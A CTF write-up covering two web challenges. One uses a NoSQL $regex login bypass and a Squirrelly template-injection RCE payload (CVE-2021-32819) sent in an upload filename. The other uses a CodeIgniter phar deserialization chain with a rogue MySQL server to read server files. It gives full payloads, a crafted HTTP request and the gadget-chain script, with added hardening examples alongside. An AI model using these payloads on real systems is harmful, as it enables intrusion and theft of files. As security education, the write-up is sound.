EzNode2
Log in as admin via NoSQL injection. Most operators are banned, but `$regex` still gets through:

```json
{"username":{"$regex":".*?"},"password":{"$regex":".*?"}}
```
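Added example, not code from the EzNode2 challenge: a login filter builder that refuses operator objects such as `{"$regex": ".*?"}` before any MongoDB query runs. It assumes credentials arrive as parsed JSON in `req.body`.

```javascript
// Added example, not code from the EzNode2 challenge: a login filter builder
// that refuses operator objects such as {"$regex": ".*?"} before any MongoDB
// query runs. Assumption: credentials arrive as parsed JSON in req.body.

function validateCredential(value, field) {
  // Query operators only work when the value is an object; a string can never
  // become {$regex: ...} or {$ne: ...}, so a type check closes the hole that a
  // blocklist of operator names (the approach this challenge used) leaves open.
  if (typeof value !== 'string') {
    return { ok: false, reason: `${field} must be a string` };
  }
  if (value.length === 0 || value.length > 64) {
    return { ok: false, reason: `${field} has invalid length` };
  }
  return { ok: true };
}

// Returns the filter for collection.findOne(), or null when the request must
// be answered with 400. Only the username goes into the query; the password
// is compared server-side (hash compare) after the lookup, never as a filter.
function buildLoginFilter(body) {
  for (const field of ['username', 'password']) {
    if (!validateCredential(body[field], field).ok) return null;
  }
  return { username: body.username };
}

// Constructed sample inputs: the write-up's $regex payload and a normal login.
const injectedBody = JSON.parse('{"username":{"$regex":".*?"},"password":{"$regex":".*?"}}');
const normalBody = { username: 'admin', password: 'correct horse battery' };
```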
After logging in you can upload files. The app uses the squirrelly template engine, which has a known CVE, CVE-2021-32819; see https://github.com/advisories/GHSA-q8j6-pwqx-pm96.

Here the filename is attacker-controlled, so test locally with the payload found online:

```text
"aaa","autoEscape":"","defaultFilter":"e');global.process.mainModule.require('child_process').exec('calc');//"
```
RCE does not trigger, because the filename cannot contain `/`. Remove the `/` and an error appears:
```text
Squirrelly Error: Bad template syntax

Invalid regular expression flags
================================

var tR='';tR ='<!DOCTYPE html>n<html lang="en">n <head>n <meta charset="utf-8">n <meta http-equiv="X-UA-Compatible" content="IE=edge">n <meta name="viewport" content="width=device-width, initial-scale=1">nn <title>Bootstrap 4, from LayoutIt!</title>nn <meta name="description" content="Source code generated using layoutit.com">n <meta name="author" content="LayoutIt!">nn <link href="/static/css/bootstrap.min.css" rel="stylesheet">n <link href="/static/css/style.css" rel="stylesheet">n <style>* {n padding: 0;n margin: 0;n }n ul {n position: -webkit-sticky;n position: sticky;n top: 0;n list-style-type: none;n margin: 0;n padding: 0;n overflow: hidden;n background-color: #333;n font-size: 20px;n }n li {n float: right;n }n n li a {n display: block;n color: white;n text-align: center;n padding: 15px 30px;n margin: 0pc 30px;n text-decoration: none;n }n li a:hover {n background-color: #111;n }n n .welcomeContainer {n padding-top: 3rem !important;n
max-width: 720px;n width: 50% !important;n padding-right: 15px;n padding-left: 15px;n margin-right: auto;n margin-left: auto;n box-sizing: border-box;n }n .welcomeContainer > p {n
margin-bottom: 1rem;n }n a {n color: #007bff;n text-decoration: none;n background-color: transparent;n }n hr {n margin-top: 1rem;n margin-bottom: 1rem;n border: 0;n border-top: 1px solid rgba(0, 0, 0, 0.1);n }n h1 {n font-size: 2.5rem;n margin-bottom: 0.5rem;n font-weight: 500;n line-height: 1.2;n }n n .uploadContainer {n max-width: 620px;n width:
50% !important;n padding-top: 3rem !important;n padding-right: 15px;n padding-left: 15px;n margin-right: auto;n margin-left: auto;n display: flex;n flex-direction: column;n }n .uploadContainer input {n display: block;n width: 98%;n height: calc(1.5em 0.75rem 2px);n font-size: 1rem;n padding: 0.2rem;n font-weight: 400;n line-height: 1.5;n color: #495057;n background-color: #fff;n background-clip: padding-box;n border: 1px solid #ced4da;n border-radius: 0.25rem;n transition: border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;n }n .uploadContainer * {n margin-top: 3px;n margin-bottom: 10px;n }n .uploadContainer p {n margin: 0;n font-size: 18px;n }n .uploadContainer button {n color: #fff;n width: 100%;n background-color: #0095ff;n border-color: #007bff;n font-weight: 400;n text-align: center;n vertical-align: middle;n border: 1px solid transparent;n padding: 0.375rem;n font-size: 1rem;n line-height: 1.5;n border-radius: 0.25rem;n transition: color 0.15s ease-in-out, background-color 0.15s ease-in-out,n border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;n }n </style>n </head>n <body>nn <div class="uploadContainer">n <center>n <h5>Give me a file, I can analyze the relevant information of it.</h5>n n <form action="/home" method="POST" enctype="multipart/form-data">n <input type="file" name="file" id="file">n <button name="submit" type="submit">Submit</button>n </form>n </center>n </div>n <br><br>n <div class="container-fluid">n <div class="row">n <div class="col-md-12">n <table class="table">n <thead>n <tr>n <th>n IDn </th>n <th>n File Namen </th>n <th>n File Sizen
</th>n <th>n Mime Typen </th>n <th>n Md5 Hashn </th>n </tr>n </thead>n <tbody>n <tr>n <td>n
0n </td>n <td>n shell.jarn </td>n <td>n 5268n </td>n <td>n application/octet-streamn </td>n
<td>n b3186dd95d6bec2a3f6d8df1f9822776n </td>n </tr>n <tr class="table-active">n <td>n 1n </td>n <td>n download.zipn
</td>n <td>n 270210n </td>n <td>n application/x-zip-compressedn </td>n <td>n 3bf555cbd8dd2adc4b72cdf2b9b45dedn </td>n </tr>n <tr class="table-success">n <td>n 2n </td>n <td>n test.phpn </td>n <td>n 31n </td>n
<td>n application/octet-streamn </td>n <td>n 2a3d83868a52c042e4c974ce2dc635f3n </td>n </tr>n <tr class="table-warning">n <td>n ';tR =c.l('F','e');global.process.mainModule.require('child_process').exec('calc');')(it.id);tR =' </td>n <td>n ';tR =c.l('F','e');global.process.mainModule.require('child_process').exec('calc');')(it.filename);tR =' </td>n <td>n ';tR =c.l('F','e');global.process.mainModule.require('child_process').exec('calc');')(it.filesize);tR =' </td>n <td>n
';tR =c.l('F','e');global.process.mainModule.require('child_process').exec('calc');')(it.mimetype);tR =' </td>n <td>n ';tR =c.l('F','e');global.process.mainModule.require('child_process').exec('calc');')(it.filehash);tR =' </td>n </tr>n </tbody>n </table>n </div>n </div>n</div>nn <script src="/static/js/jquery.min.js"></script>n <script src="/static/js/bootstrap.min.js"></script>n <script src="/static/js/scripts.js"></script>n </body>n</html>';if(cb){cb(null,tR)} return tR
```
From the error message we can see the surrounding code and build a closing sequence for it, giving the final payload:

```text
filename="aaa","autoEscape":"","defaultFilter":"e');global.process.mainModule.require('child_process').exec('calc');('"
```
Test locally:

```http
POST /home HTTP/1.1
Host: 192.168.43.172:3000
Content-Length: 377
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.43.172:3000
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryDvwrE2tlRi4jmBqg
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.43.172:3000/home
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: thejs.session=s:Up9yQEn0vPM_dMkpL_jNESYtJPmUqSuu.le9ri4EXozPqP7Arm+a+pOkGZXjxymjlBPszQ4H5WkE
Connection: close

------WebKitFormBoundaryDvwrE2tlRi4jmBqg
Content-Disposition: form-data; name="file"; filename="aaa","autoEscape":"","defaultFilter":"e');global.process.mainModule.require('child_process').exec('calc');('"
Content-Type: 123

123
------WebKitFormBoundaryDvwrE2tlRi4jmBqg
Content-Disposition: form-data; name="submit"

------WebKitFormBoundaryDvwrE2tlRi4jmBqg--
```
![image (5)](../post-img/DASCTF-NOV/image (5).png)
The calculator pops locally; against the remote target, swap in a reverse shell and you are done.
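Added example, not code from the EzNode2 challenge. The payload's shape (`"aaa","autoEscape":"","defaultFilter":"..."`) implies the upload filename is spliced into a JSON string that later becomes Squirrelly render options; that splicing pattern is an assumption reconstructed here, shown beside a hardened version that keeps user data out of the options argument.

```javascript
// Added example, not code from the EzNode2 challenge. The payload's shape
// ("aaa","autoEscape":"","defaultFilter":"...") implies the upload filename is
// spliced into a JSON string that ends up as Squirrelly render options; that
// splicing is an assumption reconstructed here, beside a hardened version.

// Fragile pattern: a filename containing a quote closes the value early and
// smuggles extra keys (autoEscape, defaultFilter) into the parsed object.
function recordFromConcat(filename) {
  return JSON.parse('{"filename":"' + filename + '"}');
}

// Hardened: JSON.stringify keeps the filename a single string value, and an
// allowlist rejects names with quotes, slashes or control characters outright.
const SAFE_FILENAME = /^[A-Za-z0-9][A-Za-z0-9._ -]{0,127}$/;

function recordFromFilename(filename) {
  if (typeof filename !== 'string' || !SAFE_FILENAME.test(filename)) {
    throw new Error('rejected filename');
  }
  return JSON.parse(JSON.stringify({ filename }));
}

// Render-argument split: anything user-derived is template *data*; the
// *options* object (CVE-2021-32819 is reached through defaultFilter) is a
// frozen server-side constant, so injected keys in the record are ignored.
const RENDER_OPTIONS = Object.freeze({ autoEscape: true });

function toRenderArgs(record) {
  return { data: record, options: RENDER_OPTIONS };
}

// Constructed sample: same structure as the write-up payload, harmless body.
const INJECTED_NAME = 'aaa","autoEscape":"","defaultFilter":"x';
```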
code4
Writeup by teammate @1manity.

The challenge environment is CodeIgniter 4.2.7. A dirsearch scan (rate-limited) finds a source leak; download www.zip, extract it and audit locally. The key part is Upload.php:
```php
<?php
namespace App\Controllers;

use CodeIgniter\Files\File;

class Upload extends BaseController
{
    protected $helpers = ['form'];

    public function index()
    {
        return view('upload_form', ['errors' => []]);
    }

    public function upload()
    {
        $validationRule = [
            'userfile' => [
                'label' => 'Image File',
                'rules' => 'uploaded[userfile]'
                    . '|max_size[userfile,100]'
                    . '|max_dims[userfile,1024,768]',
            ],
        ];
        if (! $this->validate($validationRule)) {
            $data = ['errors' => $this->validator->getErrors()];
            return view('upload_form', $data);
        }
        $img = $this->request->getFile('userfile');
        $img_content = file_get_contents($img);
        // Blocklist on the raw upload bytes only
        if (preg_match("/HALT_COMPILER/i", $img_content)) {
            die("hack");
        }
        $name = $img->getName();
        $img->store('', $name);
        return view('upload_success');
    }

    public function info()
    {
        // User-controlled path handed to File, which calls into the filesystem
        $path = $this->request->getPost('name');
        $data = ['uploaded_flleinfo' => new File($path)];
        if ($data) {
            return view('upload_info', $data);
        } else {
            return "fail";
        }
    }
}
```
Since HALT_COMPILER is banned, phar deserialization comes to mind, and that filter can be bypassed by compressing the phar. A general deserialization script can be found online (without source, though): https://blog.csdn.net/qq_48985780/article/details/121252141. Following that approach, use https://github.com/Gifts/Rogue-MySql-Server to stand up a MySQL service on a server we control, then trigger it through deserialization.

First configure the server: edit the settings in rogue_mysql_server.py.

![](../post-img/DASCTF-NOV/image (1).png)

Start it with python2; it generates mysql.log automatically. Then adapt the phar deserialization script:
```php
<?php
namespace CodeIgniter\Database\MySQLi;

class Connection
{
    public $hostname = 'xxx.xxx.xxx.xxx';
    public $port = '3307';
    public $database = 'aaa';
    public $username = 'root';
    public $password = 'root';
    public $charset = 'utf8';
}

namespace CodeIgniter;

class Model
{
    public $db;
    public $table = 'hack';

    public function __construct($db)
    {
        $this->db = $db;
    }
}

namespace CodeIgniter\Session\Handlers;

class MemcachedHandler
{
    public $lockKey = '123';
    public $memcached = 'a';

    public function __construct($memcached)
    {
        $this->memcached = $memcached;
    }
}

namespace CodeIgniter\Cache\Handlers;

class RedisHandler
{
    public $redis;

    public function __construct($redis)
    {
        $this->redis = $redis;
    }
}

$a = new RedisHandler(new \CodeIgniter\Session\Handlers\MemcachedHandler(new \CodeIgniter\Model(new \CodeIgniter\Database\MySQLi\Connection())));
echo serialize($a);

$phar = new \Phar("phar1.phar"); // the extension must be .phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); // set the stub
$phar->setMetadata($a); // store the custom meta-data in the manifest
$phar->addFromString("test.txt", "test"); // add a file to the archive
// the signature is computed automatically
$phar->stopBuffering();
```
Copy it into a VM and gzip-compress it:

```console
┌──(kali㉿kali)-[~/]
└─$ gzip phar.phar

┌──(kali㉿kali)-[~/]
└─$ mv phar.phar.gz phar.phar
```
Upload it on the upload page:

![image (E:/ctf_web/das nov/web2.assets/image (2).png)](../post-img/DASCTF-NOV/image (2).png)

Trigger the phar deserialization at /index.php/upload/info:

![image (E:/ctf_web/das nov/web2.assets/image (3).png)](../post-img/DASCTF-NOV/image (3).png)

In mysql.log on the server we see the incoming connection, and the file specified in the configuration has been read:

![image (web2.assets/image (4).png)](../post-img/DASCTF-NOV/image (4).png)